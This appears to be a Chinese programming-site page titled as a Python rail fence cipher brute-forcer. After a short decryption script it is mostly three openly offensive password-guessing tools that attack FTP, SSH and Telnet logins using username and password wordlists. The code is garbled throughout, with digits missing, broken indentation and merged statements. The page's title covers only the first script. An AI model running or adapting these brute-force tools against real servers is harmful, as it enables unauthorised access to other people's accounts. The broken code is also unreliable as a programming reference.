首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

Python脚本暴力破解栅栏密码

Posted in Python onOctober 19, 2015

今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。

方法一(通用脚本):

#!/usr/bin/env python
 # -*- coding: gbk -*-
 # -*- coding: utf_ -*-
 e = raw_input(‘请输入要解密的字符串\n‘)
 elen = len(e)
 field=[]
 for i in range(,elen):
       if(elen%i==):
         field.append(i)
 for f in field:
   b = elen / f
   result = {x:‘‘ for x in range(b)}
   for i in range(elen):
     a = i % b;
     result.update({a:result[a] + e[i]})
   d = ‘‘
   for i in range(b):
     d = d + result[i]
   print ‘分为\t‘+str(f)+‘\t‘+‘栏时,解密结果为: ‘+d

方法二:

FTP暴力破解脚本

#!/usr/bin/env python
#-*-coding = utf--*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@--
import sys, os, time
from ftplib import FTP
docs = """
      [*] This was written for educational purpose and pentest only. Use it at your own risk. 
      [*] Author will be not responsible for any damage!
      [*] Toolname : ftp_bf.py
      [*] Coder :
      [*] Version : .
      [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
    """
if sys.platform == 'linux' or sys.platform == 'linux':
  clearing = 'clear'
else:
  clearing = 'cls'
os.system(clearing)
R = "\[m";
G = "\[m";
Y = "\[m"
END = "\[m"
def logo():
  print G+"\n |---------------------------------------------------------------|"
  print " | |"
  print " | blog.sina.com.cn/kaiyongdeng |"
  print " | // ftp_bf.py v.. |"
  print " | FTP Brute Forcing Tool |"
  print " | |"
  print " |---------------------------------------------------------------|\n"
  print " \n [-] %s\n" % time.strftime("%X")
  print docs+END
def help():
  print R+"[*]-t, --target ip/hostname <> Our target"
  print "[*]-u, --usernamelist usernamelist <> usernamelist path"
  print "[*]-p, --passwordlist passwordlist <> passwordlist path"
  print "[*]-h, --help help <> print this help"
  print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit()
def bf_login(hostname,username,password):
  # sys.stdout.write("\r[!]Checking : %s " % (p))
  # sys.stdout.flush()
  try:
    ftp = FTP(hostname)
    ftp.login(hostname,username, password)
    ftp.retrlines('list')
    ftp.quit()
    print Y+"\n[!] wt,wt!!! We did it ! "
    print "[+] Target : ",hostname, ""
    print "[+] User : ",username, ""
    print "[+] Password : ",password, ""+END
    return 
  # sys.exit()
  except Exception, e:
    pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END
  sys.exit()
def anon_login(hostname):
  try:
    print G+"\n[!] Checking for anonymous login.\n"+END
    ftp = FTP(hostname) ftp.login()
    ftp.retrlines('LIST')
    print Y+"\n[!] wt,wt!!! Anonymous login successfuly !\n"+END
    ftp.quit()
  except Exception, e:
    print R+"\n[-] Anonymous login failed...\n"+END
    pass
def main():
  logo()
  try:
    for arg in sys.argv:
      if arg.lower() == '-t' or arg.lower() == '--target':
        hostname = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
        usernamelist = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
        passwordlist = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == '-h' or arg.lower() == '--help':
        help()
      elif len(sys.argv) <= :
        help()
  except:
    print R+"[-]Cheak your parametars input\n"+END
    help()
  print G+"[!] BruteForcing target ..."+END
  anon_login(hostname)
  # print "here is ok"
  # print hostname
  try:
    usernames = open(usernamelist, "r")
    user = usernames.readlines()
    count = 
    while count < len(user):
      user[count] = user[count].strip()
      count +=
  except:
    print R+"\n[-] Cheak your usernamelist path\n"+END
    sys.exit()
  # print "here is ok ",usernamelist,passwordlist
  try:
    passwords = open(passwordlist, "r")
    pwd = passwords.readlines()
    count = 
    while count < len(pwd):
      pwd[count] = pwd[count].strip()
      count +=
  except:
    print R+"\n[-] Check your passwordlist path\n"+END
    sys.exit()
  print G+"\n[+] Loaded:",len(user),"usernames"
  print "\n[+] Loaded:",len(pwd),"passwords"
  print "[+] Target:",hostname
  print "[+] Guessing...\n"+END
  for u in user: for p in pwd:
    result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))
    if result != :
      print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
    else:
      print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
    if not result :
      print R+"\n[-]There is no username ans password enabled in the list."
      print "[-]Exiting...\n"+END
if __name__ == "__main__":
  main()

SSH暴力破解

#!/usr/bin/env python
#-*-coding = UTF--*-
#author@:dengyongkai
#blog@:blog.sina.com.cn/kaiyongdeng
import sys
import os
import time
#from threading import Thread
try:
  from paramiko import SSHClient
  from paramiko import AutoAddPolicy
except ImportError:
  print G+'''
  You need paramiko module.
http://www.lag.net/paramiko/
  Debian/Ubuntu: sudo apt-get install aptitude
     : sudo aptitude install python-paramiko\n'''+END
  sys.exit()
docs = """
      [*] This was written for educational purpose and pentest only. Use it at your own risk.
      [*] Author will be not responsible for any damage!                               
      [*] Toolname    : ssh_bf.py
      [*] Author     : xfk
      [*] Version     : v..
      [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
  """
if sys.platform == 'linux' or sys.platform == 'linux':
     clearing = 'clear'
else: 
     clearing = 'cls'
os.system(clearing)
R = "\[m";
G = "\[m";
Y = "\[m"
END = "\[m"
def logo():
     print G+"\n        |---------------------------------------------------------------|"
     print "        |                                |"
     print "        |        blog.sina.com.cn/kaiyongdeng          |"
     print "        |        // ssh_bf.py v..           |"
     print "        |         SSH Brute Forcing Tool            |"
     print "        |                                |"
     print "        |---------------------------------------------------------------|\n"
     print " \n           [-] %s\n" % time.ctime()
     print docs+END
def help():
  print Y+"    [*]-H    --hostname/ip    <>the target hostname or ip address"
  print "   [*]-P    --port     <>the ssh service port(default is )"
  print "   [*]-U    --usernamelist   <>usernames list file"
  print "   [*]-P    --passwordlist   <>passwords list file"
  print "   [*]-H    --help     <>show help information"
  print "   [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END
  sys.exit()
def BruteForce(hostname,port,username,password):
    '''
    Create SSH connection to target
    '''
    ssh = SSHClient()
    ssh.set_missing_host_key_policy(AutoAddPolicy())
    try:
      ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
      status = 'ok'
      ssh.close()
    except Exception, e:
      status = 'error'
      pass
  return status
def makelist(file):
  '''
  Make usernames and passwords lists
  '''
  items = []
  try:
    fd = open(file, 'r')
  except IOError:
    print R+'unable to read file \'%s\'' % file+END
    pass
  except Exception, e:
    print R+'unknown error'+END
    pass
  for line in fd.readlines():
    item = line.replace('\n', '').replace('\r', '')
    items.append(item)
  fd.close() 
  return items
def main():
    logo() 
#  print "hello wold"
    try:  
        for arg in sys.argv:
            if arg.lower() == '-t' or arg.lower() == '--target':
                hostname = str(sys.argv[int(sys.argv[:].index(arg))+])
        if arg.lower() == '-p' or arg.lower() == '--port':
          port = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == '-u' or arg.lower() == '--userlist':
                userlist = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                wordlist = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == '-h' or arg.lower() == '--help':
                help()
      elif len(sys.argv) <= :
                help()
    except:
        print R+"[-]Cheak your parametars input\n"+END
        help()
    print G+"\n[!] BruteForcing target ...\n"+END
#    print "here is ok"
#    print hostname,port,wordlist,userlist
    usernamelist = makelist(userlist)
    passwordlist = makelist(wordlist)
    print Y+"[*] SSH Brute Force Praparing."
    print "[*] %s user(s) loaded." % str(len(usernamelist))
    print "[*] %s password(s) loaded." % str(len(passwordlist))
    print "[*] Brute Force Is Starting......."+END
  try:
      for username in usernamelist:
        for password in passwordlist:
        print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END
            current = BruteForce(hostname, port, username, password)
              if current == 'error':
          print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END
#                pass
              else:
                  print G+"\n[+] ^-^ HaHa,We Got It!!!"
                  print "[+] username: %s" % username
                  print "[+] password: %s\n" % password+END
#                  sys.exit()
  except:
    print R+"\n[-] There Is Something Wrong,Pleace Cheak It."
    print "[-] Exitting.....\n"+END
    raise
    print Y+"[+] Done.^-^\n"+END
    sys.exit()
if __name__ == "__main__":
  main()

TELNET密码暴力破解

#!usr/bin/python
#Telnet Brute Forcer
#http://www.darkcde.com
#dhydr[at]gmail[dot]com
import threading, time, random, sys, telnetlib
from copy import copy
if len(sys.argv) !=:
  print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
  sys.exit()
try:
  users = open(sys.argv[], "r").readlines()
except(IOError):
  print "Error: Check your userlist path\n"
  sys.exit()
try:
  words = open(sys.argv[], "r").readlines()
except(IOError):
  print "Error: Check your wordlist path\n"
  sys.exit()
print "\n\t  dhydr[at]gmail[dot]com TelnetBruteForcer v."
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
  for word in wordlist:
    words.append(word)
def getword():
  lock = threading.Lock()
  lock.acquire()
  if len(words) != :
    value = random.sample(words, )
    words.remove(value[])
  else:
    print "\nReloading Wordlist - Changing User\n"
    reloader()
    value = random.sample(words, )
    users.remove(users[])
  lock.release()
  if len(users) ==:
    return value[][:-], users[]
  else:
    return value[][:-], users[][:-]
class Worker(threading.Thread):
  def run(self):
    value, user = getword()
    try:
      print "-"*
      print "User:",user,"Password:",value
      tn = telnetlib.Telnet(sys.argv[])
      tn.read_until("login: ")
      tn.write(user + "\n")
      if password:
          tn.read_until("Password: ")
          tn.write(value + "\n")
      tn.write("ls\n")
      tn.write("exit\n")
      print tn.read_all()
      print "\t\nLogin successful:",value, user
      tn.close()
      work.join()
      sys.exit()
    except:
      pass
for I in range(len(words)*len(users)):
  work = Worker()
  work.start()
  time.sleep()

Python脚本暴力破解栅栏密码

- Author -

mrr

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
在Django中创建动态视图的教程
Jul 15 Python
Python设计模式之命令模式简单示例
Jan 10 Python
Python星号*与**用法分析
Feb 02 Python
python引入不同文件夹下的自定义模块方法
Oct 27 Python
Pandas统计重复的列里面的值方法
Jan 30 Python
python实现接口并发测试脚本
Jun 25 Python
浅析python redis的连接及相关操作
Nov 07 Python
利用python实现AR教程
Nov 20 Python
pytorch的梯度计算以及backward方法详解
Jan 10 Python
python使用pyecharts库画地图数据可视化的实现
Mar 25 Python
Python3获取cookie常用三种方案
Oct 05 Python
Python用access判断文件是否被占用的实例方法
Dec 17 Python
python学习笔记之调用eval函数出现invalid syntax错误问题
Oct 18 #Python
在arcgis使用python脚本进行字段计算时是如何解决中文问题的
Oct 18 #Python
详解使用Python处理文件目录的相关方法
Oct 16 #Python
详解在Python程序中自定义异常的方法
Oct 16 #Python
Python编程中的文件操作攻略
Oct 16 #Python
详解Python编程中包的概念与管理
Oct 16 #Python
解读Python编程中的命名空间与作用域
Oct 16 #Python
实用文书(952) 导游词(322) AngularJS(2) 通知(159) 申请书(21) 文书(291) HAM-2000(1) 观后感(479) 闭幕词(9) 慰问信(53)
You might like
关于mysql 字段的那个点为是定界符
2007/01/15 PHP
创建配置文件 用PHP写出自己的BLOG系统 2
2010/04/12 PHP
javascript 小型动画组件与实现代码
2010/06/02 PHP
PHP不用第三变量交换2个变量的值的解决方法
2013/06/02 PHP
54个提高PHP程序运行效率的方法
2015/07/19 PHP
学习php设计模式 php实现合成模式(composite)
2015/12/08 PHP
CI框架数据库查询之join用法分析
2016/05/18 PHP
PHP实现的XXTEA加密解密算法示例
2018/08/28 PHP
详解PHP实现支付宝小程序用户授权的工具类
2018/12/25 PHP
又一个小巧的图片预加载类
2007/05/05 Javascript
基于jquery扩展漂亮的CheckBox(自己编写)
2013/11/19 Javascript
javascript 弹出的窗口返回值给父窗口具体实现
2013/11/23 Javascript
js实现完全自定义可带多级目录的网页鼠标右键菜单方法
2015/02/28 Javascript
javascript动态设置样式style实例分析
2015/05/13 Javascript
jQuery进行组件开发完整实例
2015/12/15 Javascript
BootStrap.css 在手机端滑动时右侧出现空白的原因及解决办法
2016/06/07 Javascript
jQuery Ajax请求后台数据并在前台接收
2016/12/10 Javascript
微信小程序 scroll-view组件实现列表页实例代码
2016/12/14 Javascript
js实现3d悬浮效果
2017/02/16 Javascript
使用jQuery和ajax代替iframe的方法(详解)
2017/04/12 jQuery
Vue项目打包编译优化方案
2020/09/16 Javascript
python爬虫入门教程之糗百图片爬虫代码分享
2014/09/02 Python
Python实现抓取网页并且解析的实例
2014/09/20 Python
Python2和Python3中urllib库中urlencode的使用注意事项
2018/11/26 Python
Python切片操作去除字符串首尾的空格
2019/04/22 Python
python 实现快速生成连续、随机字母列表
2019/11/28 Python
浅谈Python3中print函数的换行
2020/08/05 Python
python自动从arxiv下载paper的示例代码
2020/12/05 Python
手把手教你用纯css3实现轮播图效果实例
2017/05/04 HTML / CSS
售后服务科岗位职责范文
2013/11/13 职场文书
会计专业职业规划:规划自我赢取未来
2014/02/12 职场文书
教师党员先进性教育自我剖析材料思想汇报
2014/09/24 职场文书
退休欢送会主持词
2015/07/01 职场文书
Pytest allure 命令行参数的使用
2021/04/18 Python
css position fixed 左右双定位的实现代码
2021/04/29 HTML / CSS
QT连接MYSQL数据库的详细步骤
2021/07/07 MySQL